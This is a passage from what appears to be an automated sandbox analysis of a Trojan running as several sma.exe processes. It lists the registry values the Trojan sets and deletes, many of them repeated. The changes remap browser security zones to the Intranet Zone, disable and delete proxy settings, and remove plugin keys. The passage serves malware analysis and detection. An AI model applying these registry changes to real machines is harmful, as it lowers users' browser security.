    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\Sense\Plugins\177]
    [HKCU\Software\Sense\Plugins\155]
    [HKCU\Software\Sense\Plugins\195]
    [HKCU\Software\Sense\Plugins\226]
    [HKCU\Software\Sense\Plugins\93]
    [HKCU\Software\Sense\Plugins\223]
    [HKCU\Software\Sense\Plugins\94]
    [HKCU\Software\Sense\Plugins\193]
    [HKCU\Software\Sense\Plugins\192]
    [HKCU\Software\Sense\Plugins\220]
    [HKCU\Software\Sense\Plugins\64]
    [HKCU\Software\Sense\Plugins\244]
    [HKCU\Software\Sense\Plugins\246]
    [HKCU\Software\Sense\Plugins\242]
    [HKCU\Software\Sense\Plugins\13]
    [HKCU\Software\Sense\Plugins\123]
    [HKCU\Software\Sense\Plugins\14]
    [HKCU\Software\Sense\Plugins\17]
    [HKCU\Software\Sense\Plugins\78]
    [HKCU\Software\Sense\Plugins\91]
    [HKCU\Software\Sense\Plugins\39]
    [HKCU\Software\Sense\Plugins\38]
    [HKCU\Software\Sense\Plugins\37]
    [HKCU\Software\Sense\Plugins\36]
    [HKCU\Software\Sense\Plugins\35]
    [HKCU\Software\Sense\Plugins\239]
    [HKCU\Software\Sense\Plugins\211]
    [HKCU\Software\Sense\Plugins\182]
    [HKCU\Software\Sense\Plugins\183]
    [HKCU\Software\Sense\Plugins\180]
    [HKCU\Software\Sense\Plugins\230]
    [HKCU\Software\Sense\Plugins\184]
    [HKCU\Software\Sense\Plugins\233]
    [HKCU\Software\Sense\Plugins\102]
    [HKCU\Software\Sense\Plugins\103]
    [HKCU\Software\Sense\Plugins\207]
    [HKCU\Software\Sense\Plugins\104]
    [HKCU\Software\Sense\Plugins\1]
    [HKCU\Software\Sense\Plugins\3]
    [HKCU\Software\Sense\Plugins\2]
    [HKCU\Software\Sense\Plugins\4]
    [HKCU\Software\Sense\Plugins\7]
    [HKCU\Software\Sense\Plugins\72]
    [HKCU\Software\Sense\Plugins\9]
    [HKCU\Software\Sense\Plugins\46]
    [HKCU\Software\Sense\Plugins\47]
    [HKCU\Software\Sense\Plugins\44]
    [HKCU\Software\Sense\Plugins\45]
    [HKCU\Software\Sense\Plugins\42]
    [HKCU\Software\Sense\Plugins\43]
    [HKCU\Software\Sense\Plugins\40]
    [HKCU\Software\Sense\Plugins\41]
    [HKCU\Software\Sense\Plugins\28]
    [HKCU\Software\Sense\Plugins]
    [HKCU\Software\Sense\Plugins\21]
    [HKCU\Software\Sense\Plugins\22]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process sma.exe:3780 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "3A FC 4A B4 E2 A1 E7 D3 62 42 94 8E 89 FE 6E F1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process sma.exe:620 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "D9 9A 38 09 3D E8 86 F8 F8 9A 40 C8 2E D9 0F 06"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following value(s) in system registry:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoConfigURL"
    "ProxyServer"

    The process sma.exe:4088 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "6A 04 F6 2B 65 AE DF 8C 32 2C 13 DD 12 D9 55 C5"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following value(s) in system registry:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoConfigURL"
    "ProxyServer"

    The process sma.exe:3724 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "3B C3 F3 00 0E CF A4 84 70 7D 49 16 2E 18 C9 B6"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\LocalService\Cookies"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\LocalService\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following value(s) in system registry:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoConfigURL"
    "ProxyServer"

    The process sma.exe:3972 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "67 65 20 56 59 ED 13 6A DB 95 E8 45 50 A5 B3 AF"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process sma.exe:324 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "B5 C1 2E CA ED 15 D2 B1 F8 13 32 CC 61 EA DA FB"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following value(s) in system registry:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoConfigURL"
    "ProxyServer"

    The process sma.exe:3056 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "0C AD E3 99 C3 C1 F2 1D 7D 70 D5 48 A7 EB B4 D7"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process sma.exe:3068 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "00 79 56 4B 29 7C 5D 32 55 16 CF 24 32 FE B1 9D"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
